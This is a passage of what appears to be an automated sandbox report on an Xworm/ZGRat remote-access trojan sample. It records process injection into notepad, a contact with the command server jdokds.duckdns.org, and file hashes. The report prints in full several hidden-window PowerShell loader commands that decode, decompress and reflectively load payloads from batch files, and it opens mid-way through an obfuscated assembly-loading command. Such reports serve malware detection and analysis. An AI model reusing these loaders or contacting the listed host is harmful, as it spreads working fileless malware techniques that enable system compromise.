6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/3044-2-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/3044-3-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/3044-4-0x00000000028A0000-0x00000000028E0000-memory.dmp

memory/3044-5-0x00000000028A0000-0x00000000028E0000-memory.dmp

memory/3044-6-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/3044-7-0x00000000028A0000-0x00000000028E0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

57s

Max time network

173s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1252 created 3472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

ZGRat

rat zgrat

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vxboda.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\vxboda.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jznltd.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Flmceaelwj = Get-Content 'C:\Users\Admin\AppData\Local\Temp\jznltd.bat' | select-object -Last 1; $Qpiedhffan = [System.Convert]::FromBase64String($Flmceaelwj);$Tlfdzhtvv = New-Object System.IO.MemoryStream( , $Qpiedhffan );$Oosvmvwadrd = New-Object System.IO.MemoryStream;$Ipxfr = New-Object System.IO.Compression.GzipStream $Tlfdzhtvv, ([IO.Compression.CompressionMode]::Decompress);$Ipxfr.CopyTo( $Oosvmvwadrd );$Ipxfr.Close();$Tlfdzhtvv.Close();[byte[]] $Qpiedhffan = $Oosvmvwadrd.ToArray();[Array]::Reverse($Qpiedhffan); $Uyqgmoqrr = [System.Threading.Thread]::GetDomain().Load($Qpiedhffan); $Premz = $Uyqgmoqrr.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wwtghi.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dsumix.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dsumix.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\wwtghi.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 jdokds.duckdns.org udp
GB 57.128.155.22:8895 jdokds.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5np0u1fr.3cu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1252-9-0x0000022049F00000-0x0000022049F22000-memory.dmp

memory/1252-10-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1252-11-0x0000022062390000-0x00000220623A0000-memory.dmp

memory/1252-12-0x0000022062390000-0x00000220623A0000-memory.dmp

memory/1252-13-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1252-14-0x0000022062390000-0x00000220623A0000-memory.dmp

memory/1252-15-0x0000022062390000-0x00000220623A0000-memory.dmp

memory/1252-16-0x0000022049C60000-0x0000022049CB3000-memory.dmp

memory/1252-17-0x0000022064810000-0x0000022064863000-memory.dmp

memory/2060-18-0x0000015558CA0000-0x0000015558CAF000-memory.dmp

memory/2060-19-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/2060-21-0x000001555A9C0000-0x000001555A9D0000-memory.dmp

memory/2060-22-0x000001555A9C0000-0x000001555A9D0000-memory.dmp

memory/2060-23-0x000001555A9C0000-0x000001555A9D0000-memory.dmp

memory/2060-20-0x000001555A8E0000-0x000001555A8EE000-memory.dmp

memory/1252-27-0x0000022064810000-0x0000022064863000-memory.dmp

memory/1252-26-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/2060-28-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vxboda.bat

MD5 a27d0d05a470dc95f1c74c7861761e9f
SHA1 c4533a4822975c7a6316e375e365df82676dce76
SHA256 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7
SHA512 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f

memory/2060-33-0x000001555A9C0000-0x000001555A9D0000-memory.dmp

memory/376-34-0x0000000075300000-0x0000000075AB0000-memory.dmp

memory/376-35-0x0000000004AE0000-0x0000000004AF0000-memory.dmp

memory/376-36-0x0000000004960000-0x0000000004996000-memory.dmp

memory/2060-37-0x000001555A9C0000-0x000001555A9D0000-memory.dmp

memory/2060-38-0x000001555A9C0000-0x000001555A9D0000-memory.dmp

memory/376-40-0x0000000005120000-0x0000000005748000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jznltd.bat

MD5 b73dc1ad88598d67c62f694c382be267
SHA1 7a5574b1e22e860e71c47104a588cfbcc78f9a63
SHA256 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687
SHA512 d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675

memory/376-44-0x0000000004E50000-0x0000000004E72000-memory.dmp

memory/376-45-0x0000000005750000-0x00000000057B6000-memory.dmp

memory/376-48-0x0000000005840000-0x00000000058A6000-memory.dmp

memory/376-56-0x0000000005940000-0x0000000005C94000-memory.dmp

memory/3268-57-0x0000000075300000-0x0000000075AB0000-memory.dmp

memory/3268-58-0x0000000004F00000-0x0000000004F10000-memory.dmp

memory/3268-59-0x0000000004F00000-0x0000000004F10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4267fc1e87ee23aeb8b9a7d0497091c5
SHA1 59ddae7dc44b8317ff933ad113493eb1644c52c0
SHA256 ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d
SHA512 1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb

memory/376-71-0x0000000005F50000-0x0000000005F6E000-memory.dmp

memory/3268-72-0x0000000006410000-0x000000000645C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wwtghi.bat

MD5 7834dbd67492fa350447dbd5debda5fc
SHA1 e008dff36158beb0425d32036d9f65d5653184bd
SHA256 d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573
SHA512 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a

memory/376-76-0x0000000004AE0000-0x0000000004AF0000-memory.dmp

memory/3268-77-0x0000000004F00000-0x0000000004F10000-memory.dmp

memory/3268-78-0x0000000007680000-0x0000000007716000-memory.dmp

memory/3268-79-0x00000000068B0000-0x00000000068CA000-memory.dmp

memory/376-80-0x00000000064B0000-0x00000000064D2000-memory.dmp

memory/376-81-0x00000000077C0000-0x0000000007D64000-memory.dmp

memory/3268-82-0x0000000008900000-0x0000000008F7A000-memory.dmp

memory/376-85-0x00000000072B0000-0x00000000074E0000-memory.dmp

memory/3268-84-0x00000000077A0000-0x0000000007A38000-memory.dmp

memory/376-88-0x0000000007560000-0x000000000777E000-memory.dmp

memory/3268-86-0x0000000008280000-0x0000000008506000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dsumix.cmd

MD5 f95dfe17a283dbb9301936821032b9a4
SHA1 357edc773d07784e7fd295c2b273305994789fc4
SHA256 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c
SHA512 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

memory/376-94-0x0000000075300000-0x0000000075AB0000-memory.dmp

memory/2600-95-0x0000000075300000-0x0000000075AB0000-memory.dmp

memory/2600-96-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/2600-97-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/376-108-0x0000000004AE0000-0x0000000004AF0000-memory.dmp

memory/3564-109-0x0000000075300000-0x0000000075AB0000-memory.dmp

memory/3564-110-0x00000000046B0000-0x00000000046C0000-memory.dmp

memory/3564-111-0x00000000046B0000-0x00000000046C0000-memory.dmp

memory/3268-121-0x0000000075300000-0x0000000075AB0000-memory.dmp

memory/2600-122-0x0000000007460000-0x00000000076C2000-memory.dmp

memory/2600-123-0x0000000007D30000-0x0000000007F8C000-memory.dmp

memory/2600-124-0x0000000008030000-0x00000000080C2000-memory.dmp

memory/2600-125-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-126-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-128-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-130-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-132-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-134-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-136-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-138-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-140-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-142-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-144-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-146-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-148-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-150-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-152-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-154-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-156-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-158-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-160-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-162-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-164-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-166-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-168-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-170-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-172-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-174-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-176-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-178-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-180-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-182-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-184-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/2600-186-0x0000000007D30000-0x0000000007F87000-memory.dmp

memory/3564-194-0x0000000006E80000-0x00000000070B2000-memory.dmp

memory/3268-193-0x0000000004F00000-0x0000000004F10000-memory.dmp

memory/3564-196-0x00000000046B0000-0x00000000046C0000-memory.dmp

memory/3564-204-0x0000000007130000-0x0000000007352000-memory.dmp

memory/3268-337-0x0000000004F00000-0x0000000004F10000-memory.dmp

memory/376-479-0x0000000004AE0000-0x0000000004AF0000-memory.dmp

memory/3268-481-0x0000000004F00000-0x0000000004F10000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

157s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/2280-0-0x00000174EB780000-0x00000174EB7A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klazp0bt.lvc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
